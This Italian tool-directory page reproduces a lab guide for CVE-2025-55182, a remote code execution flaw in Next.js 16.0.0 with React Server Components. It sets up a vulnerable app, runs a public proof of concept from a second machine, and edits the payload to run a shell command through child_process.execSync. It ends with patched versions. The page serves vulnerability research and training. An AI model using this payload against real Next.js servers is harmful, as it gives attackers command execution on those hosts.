Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
cve-2025-55182-poc-test — Lab riproducibile che dimostra CVE-2025-55182 Remote Code Execution contro Next.js 16.0.0 con React Server Components, incluse l'esecuzione di exploit esterni e la verifica degli effetti collaterali. | Kitploit
Strumenti/GitHubGitHub/jandelima/cve-2025-55182-poc-test
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneLab e Pratica
GitHubjandelima/cve-2025-55182-poc-test

cve-2025-55182-poc-test

Lab riproducibile che dimostra CVE-2025-55182 Remote Code Execution contro Next.js 16.0.0 con React Server Components, incluse l'esecuzione di exploit esterni e la verifica degli effetti collaterali.

Vedi Repository
38 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Laboratorio di dimostrazione CVE-2025-55182 (Next.js / React RSC RCE)

Questo documento fornisce una configurazione completa e riproducibile per dimostrare l'esecuzione di codice remoto (RCE) CVE-2025-55182 contro un ambiente vulnerabile Next.js + React Server Components in esecuzione all'interno di una VM Ubuntu con Multipass.

L'exploit viene eseguito dall'esterno della VM, dimostrando la sfruttabilità remota e preparando l'ambiente per il rilevamento di comportamenti anomali.

Source: https://github.com/ejpir/CVE-2025-55182-research


1. Creare e preparare la VM Ubuntu

2. Configurazione di base all'interno della VM

2.1 Aggiornare il sistema e installare le dipendenze

root@kitploit:~
sudo apt update && sudo apt upgrade -y
sudo apt install -y curl git build-essential

2.2 Installare Node.js LTS (20.x)

root@kitploit:~
curl -fsSL https://deb.nodesource.com/setup_20.x | sudo -E bash -
sudo apt install -y nodejs

Verifica:

root@kitploit:~
node -v
npm -v

2.3 Creare un utente dedicato per l'app

root@kitploit:~
sudo adduser reactlab
sudo usermod -aG sudo reactlab
su - reactlab

3. Distribuire l'app Next.js vulnerabile

3.1 Creare la directory di lavoro

root@kitploit:~
mkdir ~/react2shell-lab
cd ~/react2shell-lab

3.2 Generare un progetto Next.js App Router minimale

root@kitploit:~
npx create-next-app@latest vulnerable-app
cd vulnerable-app

3.3 Fissare le versioni vulnerabili in package.json

Modificare le dipendenze:

root@kitploit:~
"dependencies": {
  "next": "16.0.0",
  "react": "19.1.0",
  "react-dom": "19.1.0"
}

Reinstallare i pacchetti:

root@kitploit:~
rm -rf node_modules package-lock.json
npm install

Verifica:

root@kitploit:~
npm list react react-dom next

Previsto:

root@kitploit:~
[email protected]
[email protected]
[email protected]

3.4 Compilare ed eseguire in modalità produzione

root@kitploit:~
npm run build
npm start

Output previsto:

root@kitploit:~
▲ Next.js 16.0.0
Local:   http://localhost:3000
Network: http://10.X.X.X:3000

start


4. Confermare l'accessibilità esterna (Macchina attaccante → VM)

Su un'altra macchina:

root@kitploit:~
curl http://10.102.169.126:3000

Dovresti ricevere la pagina HTML predefinita di Next.js.


5. Clonare e testare il PoC sulla macchina attaccante

5.1 Clonare il repository

root@kitploit:~
cd ~
git clone https://github.com/ejpir/CVE-2025-55182-research
cd CVE-2025-55182-research

5.2 Puntare il PoC all'IP del server

Trova:

root@kitploit:~
hostname: 'localhost',

Sostituisci con:

root@kitploit:~
hostname: '10.X.X.X',

5.3 Eseguire il PoC di base (semplice console.log RCE)

Con Next ancora in esecuzione:

root@kitploit:~
node test-simple.cjs

Previsto nel terminale di Next.js:

root@kitploit:~
NON-CHUNKED-RCE

Questo conferma l'esecuzione di codice remoto tramite React Flight utilizzando le versioni vulnerabili.

confirmed


6. Modificare il PoC per eseguire un effetto collaterale visibile (creazione file)

L'obiettivo è generare un comportamento osservabile (filesystem + esecuzione di processo).

6.1 Modificare _prefix all'interno di test-simple.cjs

Individua:

root@kitploit:~
"_prefix": "console.log('NON-CHUNKED-RCE');//"

Sostituisci con:

root@kitploit:~
"_prefix": "process.mainModule.require('child_process').execSync('touch /tmp/cve-2025-55182-syscall');console.log('NON-CHUNKED-RCE');//"

Nota: require non è disponibile nel contesto di esecuzione, ma process.mainModule.require() lo è.

6.2 Testare l'exploit modificato

Assicurati che Next sia in esecuzione, poi:

root@kitploit:~
node test-simple.cjs

Verificare la creazione del file:

root@kitploit:~
ls -l /tmp/

Dovresti vedere:

root@kitploit:~
cve-2025-55182-syscall

Questo conferma l'RCE funzionale con effetti collaterali.

start


Patch:
React ≥ 19.2.1
Next.js ≥ 16.0.7

Scarica lo strumento